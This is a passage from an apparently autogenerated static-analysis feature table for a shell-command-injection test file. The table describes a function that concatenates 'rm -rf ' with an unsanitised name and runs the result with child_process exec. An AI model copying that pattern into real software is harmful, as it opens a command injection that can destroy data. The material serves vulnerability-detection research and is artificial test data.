| name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:5:83:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:5:83:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:5:83:8 | exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:5:83:8 | exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:5:83:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:10:83:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:22:83:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:10 | args1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:10 | args1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:10 | args1 | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:10 | args1 | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:10 | args1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 = ["node"] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 = ["node"] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 = ["node"] | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 = ["node"] | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:6:85:21 | args1 = ["node"] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:14:85:21 | ["node"] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:14:85:21 | ["node"] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:14:85:21 | ["node"] | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:14:85:21 | ["node"] | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:14:85:21 | ["node"] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:85:15:85:20 | "node" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:6 | args1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:6 | args1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:6 | args1 | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:6 | args1 | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:6 | args1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:11 | args1.push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:11 | args1.push | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:11 | args1.push | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:11 | args1.push | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:11 | args1.push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | exceptional return of args1.push(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | exceptional return of args1.push(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | exceptional return of args1.push(name) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| 